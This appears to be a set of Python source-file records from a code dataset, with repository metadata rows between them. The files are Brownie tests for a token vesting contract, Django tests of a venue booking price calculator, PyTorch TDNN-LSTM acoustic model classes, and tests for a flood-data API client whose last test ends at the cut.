| 35.24359 | 89 | 0.725355 | 342 | 2,749 | 5.640351 | 0.140351 | 0.270607 | 0.111975 | 0.037325 | 0.88647 | 0.844479 | 0.831519 | 0.795231 | 0.795231 | 0.795231 | 0 | 0.040203 | 0.140415 | 2,749 | 77 | 90 | 35.701299 | 0.776132 | 0.007639 | 0 | 0.789474 | 0 | 0 | 0.083272 | 0 | 0 | 0 | 0 | 0 | 0.175439 | 1 | 0.070175 | false | 0 | 0.035088 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ac0945859262e7ce41f506376067b0f634f032be | 7,685 | py | Python | tests/test_vesting.py | Buffer-Finance/Vesting-Contracts | 40c45a1e453545e1599b8e6488a3569fb1607749 | [
"MIT"
] | null | null | null | tests/test_vesting.py | Buffer-Finance/Vesting-Contracts | 40c45a1e453545e1599b8e6488a3569fb1607749 | [
"MIT"
] | null | null | null | tests/test_vesting.py | Buffer-Finance/Vesting-Contracts | 40c45a1e453545e1599b8e6488a3569fb1607749 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import pytest
import time
import brownie
def test_revoke_one_prevents_them_from_claiming(contracts, accounts, chain):
token_contract, vesting_contract = contracts
# set the periods in the contracts
days = 86400
months = 30 * days
periods = map(lambda x: x*months, range(11))
periods = list(periods)
percents = [5] + ([9.5] * 10)
percents = map(lambda x: int(x*1e4), percents)
percents = list(percents)
vesting_contract.setupVestingMode(periods, percents, {'from': accounts[0]})
users = accounts[1:3]
allocations = [(index+1) * 1000e18 for index, user in enumerate(users)]
allocations = map(lambda x: int(x), allocations)
allocations = list(allocations)
total_tokens = sum(allocations)
token_contract.approve(vesting_contract.address, total_tokens, {'from': accounts[0]})
vesting_contract.allotTokens(users, allocations, {'from': accounts[0]})
startTime = int(time.time())
vesting_contract.startVestingMode(startTime, {'from': accounts[0]})
# print("isVestingClaimable", vesting_contract.isVestingClaimable(1))
assert (False, 0) == vesting_contract.isVestingClaimable(0)
chain.sleep(10)
chain.mine(1)
vesting_length = vesting_contract.vestInfoLength()
def _claim(index):
print("index", index)
print("isVestingClaimable", vesting_contract.isVestingClaimable(index))
print("vestInfo", vesting_contract.vestInfo())
for user_id, user in enumerate(users):
user_initial_balance = token_contract.balanceOf(user)
contract_initial_balance = token_contract.balanceOf(vesting_contract)
vesting_contract.claimVestedTokens(index, {'from': user})
user_final_balance = token_contract.balanceOf(user)
contract_final_balance = token_contract.balanceOf(vesting_contract)
assert user_final_balance - user_initial_balance == contract_initial_balance - contract_final_balance
assert vesting_contract.tokensAlloted(user) == allocations[user_id]
for j in range(0, index+1):
# Should fail on reclaiming
with brownie.reverts("This vest amount is already claimed"):
vesting_contract.claimVestedTokens(j, {'from': user})
if index <= vesting_length - 2:
for j in range(index + 1, vesting_length):
with brownie.reverts("Not claimable at this time"):
vesting_contract.claimVestedTokens(j, {'from': user})
_, remaining_time = vesting_contract.isVestingClaimable(j)
assert months * (j-index) >= remaining_time
assert remaining_time > months * (j-index-1)
# for index in range(vesting_length):
_claim(0)
chain.mine(timedelta=months)
# revoke for 1st user
contract_initial_balance = token_contract.balanceOf(vesting_contract)
tokens_left = vesting_contract.tokensAlloted(users[0]) - vesting_contract.tokensClaimed(users[0])
vesting_contract.revoke(users[0], {'from': accounts[0]})
contract_final_balance = token_contract.balanceOf(vesting_contract)
assert tokens_left == contract_initial_balance - contract_final_balance
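The vesting schedule both tests configure releases 5% up front, then 9.5% per month for ten months. A standalone sanity check that this schedule covers the full allocation (the `1e4` scaling mirrors the test setup; whether `setupVestingMode` interprets these integers as basis-point-style values is an assumption):

```python
# Vesting schedule used in the tests: 5% up front, then 9.5% monthly x 10.
percents = [5] + [9.5] * 10

# Same integer scaling the tests apply before calling setupVestingMode.
scaled = [int(p * 1e4) for p in percents]

# 5 + 10 * 9.5 == 100, so the scaled values sum to a full allocation.
assert sum(scaled) == 100 * 10**4
print(len(scaled), sum(scaled))  # 11 1000000
```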
def test_setup_vesting(contracts, accounts, chain):
token_contract, vesting_contract = contracts
# set the periods in the contracts
days = 86400
months = 30 * days
periods = map(lambda x: x*months, range(11))
periods = list(periods)
percents = [5] + ([9.5] * 10)
percents = map(lambda x: int(x*1e4), percents)
percents = list(percents)
vesting_contract.setupVestingMode(periods, percents, {'from': accounts[0]})
users = accounts[1:3]
allocations = [(index+1) * 1000e18 for index, user in enumerate(users)]
allocations = map(lambda x: int(x), allocations)
allocations = list(allocations)
total_tokens = sum(allocations)
token_contract.approve(vesting_contract.address, total_tokens, {'from': accounts[0]})
vesting_contract.allotTokens(users, allocations, {'from': accounts[0]})
startTime = int(time.time())
vesting_contract.startVestingMode(startTime, {'from': accounts[0]})
# print("isVestingClaimable", vesting_contract.isVestingClaimable(1))
assert (False, 0) == vesting_contract.isVestingClaimable(0)
chain.sleep(10)
chain.mine(1)
vesting_length = vesting_contract.vestInfoLength()
def _claim(index):
print("index", index)
print("isVestingClaimable", vesting_contract.isVestingClaimable(index))
print("vestInfo", vesting_contract.vestInfo())
for user_id, user in enumerate(users):
user_initial_balance = token_contract.balanceOf(user)
contract_initial_balance = token_contract.balanceOf(vesting_contract)
vesting_contract.claimVestedTokens(index, {'from': user})
user_final_balance = token_contract.balanceOf(user)
contract_final_balance = token_contract.balanceOf(vesting_contract)
assert user_final_balance - user_initial_balance == contract_initial_balance - contract_final_balance
assert vesting_contract.tokensAlloted(user) == allocations[user_id]
for j in range(0, index+1):
# Should fail on reclaiming
with brownie.reverts("This vest amount is already claimed"):
vesting_contract.claimVestedTokens(j, {'from': user})
if index <= vesting_length - 2:
for j in range(index + 1, vesting_length):
with brownie.reverts("Not claimable at this time"):
vesting_contract.claimVestedTokens(j, {'from': user})
_, remaining_time = vesting_contract.isVestingClaimable(j)
assert months * (j-index) >= remaining_time
assert remaining_time > months * (j-index-1)
for index in range(vesting_length):
_claim(index)
chain.mine(timedelta=months)
# chain.mine(1)
# @pytest.mark.parametrize("idx", range(5))
# def test_sample(contracts, accounts):
# ibfr, vesting = contracts
# assert vesting.token() == ibfr.address
# def test_approve(token, accounts):
# token.approve(accounts[1], 10**19, {'from': accounts[0]})
# assert token.allowance(accounts[0], accounts[1]) == 10**19
# def test_modify_approve(token, accounts):
# token.approve(accounts[1], 10**19, {'from': accounts[0]})
# token.approve(accounts[1], 12345678, {'from': accounts[0]})
# assert token.allowance(accounts[0], accounts[1]) == 12345678
# def test_revoke_approve(token, accounts):
# token.approve(accounts[1], 10**19, {'from': accounts[0]})
# token.approve(accounts[1], 0, {'from': accounts[0]})
# assert token.allowance(accounts[0], accounts[1]) == 0
# def test_approve_self(token, accounts):
# token.approve(accounts[0], 10**19, {'from': accounts[0]})
# assert token.allowance(accounts[0], accounts[0]) == 10**19
# def test_only_affects_target(token, accounts):
# token.approve(accounts[1], 10**19, {'from': accounts[0]})
# assert token.allowance(accounts[1], accounts[0]) == 0
# def test_returns_true(token, accounts):
# tx = token.approve(accounts[1], 10**19, {'from': accounts[0]})
# assert tx.return_value is True
# def test_approval_event_fires(accounts, token):
# tx = token.approve(accounts[1], 10**19, {'from': accounts[0]})
# assert len(tx.events) == 1
# assert tx.events["Approval"].values() == [accounts[0], accounts[1], 10**19]
| 36.947115 | 113 | 0.662329 | 882 | 7,685 | 5.603175 | 0.141723 | 0.118373 | 0.047349 | 0.058681 | 0.866856 | 0.860178 | 0.846418 | 0.846418 | 0.846418 | 0.820923 | 0 | 0.029789 | 0.218087 | 7,685 | 207 | 114 | 37.125604 | 0.792644 | 0.235003 | 0 | 0.893204 | 0 | 0 | 0.041774 | 0 | 0 | 0 | 0 | 0 | 0.106796 | 1 | 0.038835 | false | 0 | 0.029126 | 0 | 0.067961 | 0.058252 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3bac93c5a13449522177bfe1e41215930ebb9974 | 27,537 | py | Python | booking/tests/test_models.py | bnico99/foruminternational | 8d577d3d929277b88d9c6deb1a77f90fb34ad469 | [
"BSD-3-Clause"
] | null | null | null | booking/tests/test_models.py | bnico99/foruminternational | 8d577d3d929277b88d9c6deb1a77f90fb34ad469 | [
"BSD-3-Clause"
] | 4 | 2021-04-08T21:11:19.000Z | 2021-06-10T19:40:34.000Z | booking/tests/test_models.py | bnico99/foruminternational | 8d577d3d929277b88d9c6deb1a77f90fb34ad469 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib.auth.models import User, AnonymousUser
from django.test import TestCase
from django.db import models
from booking.models import Event, Blocker, Booking
import datetime as dt
class TestModels(TestCase):
# Testing the case: # underWeek # Student # under50 # 3h # no refrigerator # no toilets needed # expected outcome 20
def test_price1(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (20.0,))
# Testing the case: # underWeek # Student # under50 # 3h # refrigerator # no toilets needed # expected outcome 20
def test_price2(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='yes',
number_people=5,
refrigerator='yes',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (20.0,))
# Testing the case: # underWeek # Student # under50 # 6h # no refrigerator # no toilets needed # expected outcome 40
def test_price3(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=6,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (40.0,))
# Testing the case: # underWeek # Student # under50 # 12h # no refrigerator # toilets always needed # expected outcome 120
def test_price4(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=12,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (120.0,))
# Testing the case: # underWeek # Student # under50 # 6h # no refrigerator # toilets needed because of starting time # expected outcome 80
def test_price5(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(18, 0),
duration=6,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (80.0,))
# Testing the case: # underWeek # Student # under50 # 3h # no refrigerator # toilets needed because of starting time # expected outcome 60
def test_price6(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(22, 0),
duration=3,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (60.0,))
# Testing the case: # underWeek # Student # over50 # 3h # no refrigerator # no toilets needed # expected outcome 40
def test_price7(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (40.0,))
# Testing the case: # underWeek # Student # over50 # 3h # no refrigerator # toilets needed because of starting time # expected outcome 80
def test_price8(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(22, 0),
duration=3,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (80.0,))
# Testing the case: # underWeek # Student # over50 # 6h # no refrigerator # no toilets needed # expected outcome 70
def test_price9(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=6,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (70.0,))
# Testing the case: # underWeek # Student # over50 # 6h # no refrigerator # toilets needed because of starting time # expected outcome 110
def test_price10(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(17, 0),
duration=6,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (110.0,))
# Testing the case: # underWeek # Student # over50 # 12h # no refrigerator # toilets always needed # expected outcome 170
def test_price11(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(17, 0),
duration=12,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (170.0,))
# Testing the case: # underWeek # noStudent # under50 # 3h # refrigerator # no toilets needed # expected outcome 40
def test_price12(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='no',
number_people=5,
refrigerator='yes',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (40.0,))
# Testing the case: # underWeek # noStudent # under50 # 6h # no refrigerator # no toilets needed # expected outcome 70
def test_price13(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=6,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (70.0,))
# Testing the case: # underWeek # noStudent # under50 # 12h # no refrigerator # toilets always needed # expected outcome 165
def test_price14(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=12,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (165.0,))
# Testing the case: # underWeek # noStudent # under50 # 6h # no refrigerator # toilets needed because of starting time # expected outcome 110
def test_price15(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(18, 0),
duration=6,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (110.0,))
# Testing the case: # underWeek # noStudent # under50 # 3h # no refrigerator # toilets needed because of starting time # expected outcome 80
def test_price16(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(22, 0),
duration=3,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (80.0,))
# Testing the case: # underWeek # noStudent # over50 # 3h # no refrigerator # no toilets needed # expected outcome 65
def test_price17(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (65.0,))
# Testing the case: # underWeek # noStudent # over50 # 3h # no refrigerator # toilets needed because of starting time # expected outcome 105
def test_price18(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(22, 0),
duration=3,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (105.0,))
# Testing the case: # underWeek # noStudent # over50 # 6h # no refrigerator # no toilets needed # expected outcome 110
def test_price19(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=6,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (110.0,))
# Testing the case: # underWeek # noStudent # over50 # 6h # no refrigerator # toilets needed because of starting time # expected outcome 150
def test_price20(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(17, 0),
duration=6,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
        t = booking.calculate_price_event()
        self.assertEqual(t, 150.0)
    # Testing the case: # underWeek # noStudent # over50 # 12h # no refrigerator # toilets needed because always needed at this duration # expected outcome 190
def test_price21(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(17, 0),
duration=12,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
        t = booking.calculate_price_event()
        self.assertEqual(t, 190.0)
# Testing the case: #Weekend #Student #12h # expected outcome 165
def test_price22(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 12),
start_time=dt.time(10, 0),
duration=12,
student='yes',
number_people= 5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
        t = booking.calculate_price_event()
        self.assertEqual(t, 165.0)
# Testing the case: #Weekend #Student #24h # expected outcome 280
def test_price23(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 12),
start_time=dt.time(10, 0),
duration=24,
student='yes',
number_people=125,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
        t = booking.calculate_price_event()
        self.assertEqual(t, 280.0)
# Testing the case: #Weekend #noStudent 12h # expected outcome 265
def test_price24(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 12),
start_time=dt.time(10, 0),
duration=12,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
        t = booking.calculate_price_event()
        self.assertEqual(t, 265.0)
# Testing the case: #Weekend #noStudent 24h # expected outcome 380
def test_price25(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 12),
start_time=dt.time(10, 0),
duration=24,
student='no',
number_people=50,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
        t = booking.calculate_price_event()
        self.assertEqual(t, 380.0)
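A recurring pitfall in tests like these: a stray trailing comma after a call, as in `t = booking.calculate_price_event(),`, silently wraps the result in a one-element tuple, forcing assertions to compare against `(80.0,)` instead of the bare `80.0`. A minimal standalone sketch (the hypothetical `price` stands in for `calculate_price_event`):

```python
def price():
    # Stand-in for Booking.calculate_price_event(); assumed to return a float.
    return 80.0

t = price(),            # trailing comma builds a 1-tuple: (80.0,)
u = price()             # no comma: the plain float 80.0
print(t, u)
```

Dropping the comma and asserting on the bare float keeps the comparison honest and the failure messages readable.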
# snowfall/models/tdnn_lstm.py (yaguanghu/snowfall, Apache-2.0)
from torch import Tensor
from torch import nn
from snowfall.models import AcousticModel
class TdnnLstm1a(AcousticModel):
"""
Args:
num_features (int): Number of input features
num_classes (int): Number of output classes
"""
def __init__(self, num_features: int, num_classes: int, subsampling_factor: int = 3) -> None:
super().__init__()
self.num_features = num_features
self.num_classes = num_classes
self.subsampling_factor = subsampling_factor
self.tdnn = nn.Sequential(
nn.Conv1d(in_channels=num_features,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=self.subsampling_factor, # <---- stride=3: subsampling_factor!
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
)
self.lstm = nn.LSTM(500, 500)
self.dropout = nn.Dropout(0.5)
self.tdnn2 = nn.Sequential(
nn.Conv1d(in_channels=500,
out_channels=2000,
kernel_size=1,
stride=1,
padding=0), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=2000, affine=False),
nn.Conv1d(in_channels=2000,
out_channels=num_classes,
kernel_size=1,
stride=1,
padding=0)
)
def forward(self, x: Tensor) -> Tensor:
r"""
Args:
x (torch.Tensor): Tensor of dimension (batch_size, num_features, input_length).
Returns:
Tensor: Predictor tensor of dimension (batch_size, number_of_classes, input_length).
"""
x = self.tdnn(x)
x, _ = self.lstm(x.permute(2, 0, 1)) # (B, F, T) -> (T, B, F)
x = x.permute(1, 2, 0) # (T, B, F) -> (B, F, T)
x = self.dropout(x)
x = self.tdnn2(x)
x = nn.functional.log_softmax(x, dim=1)
return x
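The forward pass above shuttles between the Conv1d layout `(B, F, T)` and the LSTM layout `(T, B, F)`. The index juggling can be sanity-checked on shapes alone; `permute_shape` below is an illustrative pure-Python helper, not a torch API:

```python
# permute(2, 0, 1) maps (B, F, T) -> (T, B, F); permute(1, 2, 0) maps it back.
def permute_shape(shape, dims):
    # Mirror of Tensor.permute applied to a shape tuple.
    return tuple(shape[d] for d in dims)

btf = (2, 500, 7)                      # (B, F, T) as produced by the TDNN
tbf = permute_shape(btf, (2, 0, 1))    # (T, B, F), what nn.LSTM consumes
back = permute_shape(tbf, (1, 2, 0))   # restored to (B, F, T) for tdnn2
print(tbf, back)                       # (7, 2, 500) (2, 500, 7)
```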
class TdnnLstm1b(AcousticModel):
"""
Args:
num_features (int): Number of input features
num_classes (int): Number of output classes
"""
def __init__(self, num_features: int, num_classes: int, subsampling_factor: int = 3) -> None:
super().__init__()
self.num_features = num_features
self.num_classes = num_classes
self.subsampling_factor = subsampling_factor
self.tdnn = nn.Sequential(
nn.Conv1d(in_channels=num_features,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=self.subsampling_factor, # <---- stride: subsampling_factor!
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
)
self.lstms = nn.ModuleList([
nn.LSTM(input_size=500, hidden_size=500, num_layers=1)
for _ in range(5)
])
self.lstm_bnorms = nn.ModuleList([
nn.BatchNorm1d(num_features=500, affine=False)
for _ in range(5)
])
self.dropout = nn.Dropout(0.2)
self.linear = nn.Linear(in_features=500, out_features=self.num_classes)
def forward(self, x: Tensor) -> Tensor:
"""
Args:
x (torch.Tensor): Tensor of dimension (batch_size, num_features, input_length).
Returns:
Tensor: Predictor tensor of dimension (batch_size, number_of_classes, input_length).
"""
x = self.tdnn(x)
x = x.permute(2, 0, 1) # (B, F, T) -> (T, B, F) -> how LSTM expects it
for lstm, bnorm in zip(self.lstms, self.lstm_bnorms):
x_new, _ = lstm(x)
x_new = bnorm(x_new.permute(1, 2, 0)).permute(2, 0, 1) # (T, B, F) -> (B, F, T) -> (T, B, F)
x_new = self.dropout(x_new)
x = x_new + x # skip connections
x = x.transpose(1, 0) # (T, B, F) -> (B, T, F) -> linear expects "features" in the last dim
x = self.linear(x)
x = x.transpose(1, 2) # (B, T, F) -> (B, F, T) -> shape expected by Snowfall
x = nn.functional.log_softmax(x, dim=1)
return x
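Both models realize `subsampling_factor` with a single stride-3 Conv1d: with `kernel_size=3` and `padding=1` every other convolution preserves the time length, while the strided layer divides it. The standard Conv1d output-length formula (dilation 1) can be checked in isolation; the frame counts here are illustrative, not taken from snowfall:

```python
def conv1d_out_len(l_in: int, kernel_size: int = 3, stride: int = 1, padding: int = 1) -> int:
    # L_out = floor((L_in + 2*padding - kernel_size) / stride) + 1
    return (l_in + 2 * padding - kernel_size) // stride + 1

print(conv1d_out_len(90))             # 90: length preserved by the stride-1 layers
print(conv1d_out_len(90, stride=3))   # 30: the strided layer subsamples by 3
```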
# tests/api/test_historic.py (opleban/fsf_api_access_python, MIT)
# Author: Kelvin Lai <kelvin@firststreet.org>
# Copyright: This module is owned by First Street Foundation
# Standard Imports
import os
# External Imports
import pytest
# Internal Imports
import firststreet
from firststreet.errors import InvalidArgument
api_key = os.environ['FSF_API_KEY']
fs = firststreet.FirstStreet(api_key)
class TestHistoricEvent:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.historic.get_event([], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_event("9")
def test_invalid(self):
event_id = [0000]
historic = fs.historic.get_event(event_id)
assert len(historic) == 1
assert historic[0].eventId == event_id[0]
assert historic[0].properties is None
assert historic[0].valid_id is False
def test_single(self):
event_id = [9]
historic = fs.historic.get_event(event_id)
assert len(historic) == 1
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[0].valid_id is True
def test_multiple(self):
event_id = [9, 13]
historic = fs.historic.get_event(event_id)
assert len(historic) == 2
historic.sort(key=lambda x: x.eventId)
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[1].eventId == event_id[1]
assert historic[1].properties is not None
assert historic[0].valid_id is True
assert historic[1].valid_id is True
def test_single_csv(self, tmpdir):
event_id = [9]
historic = fs.historic.get_event(event_id, csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[0].valid_id is True
def test_multiple_csv(self, tmpdir):
event_id = [9, 13]
historic = fs.historic.get_event(event_id, csv=True, output_dir=tmpdir)
assert len(historic) == 2
historic.sort(key=lambda x: x.eventId)
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[1].eventId == event_id[1]
assert historic[1].properties is not None
assert historic[0].valid_id is True
assert historic[1].valid_id is True
def test_mixed_invalid(self):
event_id = [9, 0]
historic = fs.historic.get_event(event_id)
assert len(historic) == 2
historic.sort(key=lambda x: x.eventId, reverse=True)
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[1].eventId == event_id[1]
assert not historic[1].properties
assert historic[0].valid_id is True
assert historic[1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
event_id = [9, 0]
historic = fs.historic.get_event(event_id, csv=True, output_dir=tmpdir)
assert len(historic) == 2
historic.sort(key=lambda x: x.eventId, reverse=True)
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
